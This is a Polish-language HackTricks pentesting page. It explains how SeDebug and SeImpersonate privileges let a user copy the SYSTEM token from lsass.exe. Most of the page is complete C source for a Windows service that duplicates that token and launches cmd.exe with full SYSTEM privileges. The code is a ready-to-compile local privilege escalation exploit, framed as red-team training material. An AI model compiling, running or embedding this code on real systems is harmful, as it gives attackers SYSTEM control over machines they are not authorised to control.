SeDebug + SeImpersonate copy token

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Następujący kod wykorzystuje uprawnienia SeDebug i SeImpersonate do skopiowania tokena z procesu działającego jako SYSTEM i z wszystkimi uprawnieniami tokena. W tym przypadku kod ten może być skompilowany i używany jako binarny serwis Windows do sprawdzenia, czy działa. Jednak główna część kodu, w której następuje podniesienie uprawnień, znajduje się wewnątrz funkcji Exploit. Wewnątrz tej funkcji można zobaczyć, że wyszukiwany jest proces _lsass.exe, następnie kopiowany jest jego token, a na koniec ten token jest używany do uruchomienia nowego _cmd.exe** z wszystkimi uprawnieniami skopiowanego tokena.

Inne procesy działające jako SYSTEM z wszystkimi lub większością uprawnień tokena to: services.exe, svhost.exe (jeden z pierwszych), wininit.exe, csrss.exe... (pamiętaj, że nie będziesz w stanie skopiować tokena z procesu chronionego). Ponadto, można użyć narzędzia Process Hacker, uruchomionego jako administrator, aby zobaczyć tokeny procesu.

// From https://cboard.cprogramming.com/windows-programming/106768-running-my-program-service.html
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#pragma comment (lib, "advapi32")

TCHAR* serviceName = TEXT("TokenDanceSrv");
SERVICE_STATUS serviceStatus;
SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
HANDLE stopServiceEvent = 0;

//This function will find the pid of a process by name
int FindTarget(const char *procname) {

HANDLE hProcSnap;
PROCESSENTRY32 pe32;
int pid = 0;

hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hProcSnap) return 0;

pe32.dwSize = sizeof(PROCESSENTRY32);

if (!Process32First(hProcSnap, &pe32)) {
CloseHandle(hProcSnap);
return 0;
}

while (Process32Next(hProcSnap, &pe32)) {
if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
pid = pe32.th32ProcessID;
break;
}
}

CloseHandle(hProcSnap);

return pid;
}


int Exploit(void) {

HANDLE hSystemToken, hSystemProcess;
HANDLE dupSystemToken = NULL;
HANDLE hProcess, hThread;
STARTUPINFOA si;
PROCESS_INFORMATION pi;
int pid = 0;


ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));

// open high privileged process
if ( pid = FindTarget("lsass.exe") )
hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
else
return -1;

// extract high privileged token
if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {
CloseHandle(hSystemProcess);
return -1;
}

// make a copy of a token
DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);

// and spawn a new process with higher privs
CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe",
NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);

return 0;
}


void WINAPI ServiceControlHandler( DWORD controlCode ) {
switch ( controlCode ) {
case SERVICE_CONTROL_SHUTDOWN:
case SERVICE_CONTROL_STOP:
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

SetEvent( stopServiceEvent );
return;

case SERVICE_CONTROL_PAUSE:
break;

case SERVICE_CONTROL_CONTINUE:
break;

case SERVICE_CONTROL_INTERROGATE:
break;

default:
break;
}
SetServiceStatus( serviceStatusHandle, &serviceStatus );
}

void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
// initialise service status
serviceStatus.dwServiceType = SERVICE_WIN32;
serviceStatus.dwCurrentState = SERVICE_STOPPED;
serviceStatus.dwControlsAccepted = 0;
serviceStatus.dwWin32ExitCode = NO_ERROR;
serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
serviceStatus.dwCheckPoint = 0;
serviceStatus.dwWaitHint = 0;

serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );

if ( serviceStatusHandle ) {
// service is starting
serviceStatus.dwCurrentState = SERVICE_START_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

// do initialisation here
stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );

// running
serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

Exploit();
WaitForSingleObject( stopServiceEvent, -1 );

// service was stopped
serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
SetServiceStatus( serviceStatusHandle, &serviceStatus );

// do cleanup here
CloseHandle( stopServiceEvent );
stopServiceEvent = 0;

// service is now stopped
serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
serviceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus( serviceStatusHandle, &serviceStatus );
}
}


void InstallService() {
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );

if ( serviceControlManager ) {
TCHAR path[ _MAX_PATH + 1 ];
if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
SC_HANDLE service = CreateService( serviceControlManager,
serviceName, serviceName,
SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
0, 0, 0, 0, 0 );
if ( service )
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
}

void UninstallService() {
SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CONNECT );

if ( serviceControlManager ) {
SC_HANDLE service = OpenService( serviceControlManager,
serviceName, SERVICE_QUERY_STATUS | DELETE );
if ( service ) {
SERVICE_STATUS serviceStatus;
if ( QueryServiceStatus( service, &serviceStatus ) ) {
if ( serviceStatus.dwCurrentState == SERVICE_STOPPED )
DeleteService( service );
}
CloseServiceHandle( service );
}
CloseServiceHandle( serviceControlManager );
}
}

int _tmain( int argc, TCHAR* argv[] )
{
if ( argc > 1 && lstrcmpi( argv[1], TEXT("install") ) == 0 ) {
InstallService();
}
else if ( argc > 1 && lstrcmpi( argv[1], TEXT("uninstall") ) == 0 ) {
UninstallService();
}
else  {
SERVICE_TABLE_ENTRY serviceTable[] = {
{ serviceName, ServiceMain },
{ 0, 0 }
};

StartServiceCtrlDispatcher( serviceTable );
}

return 0;
}
Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated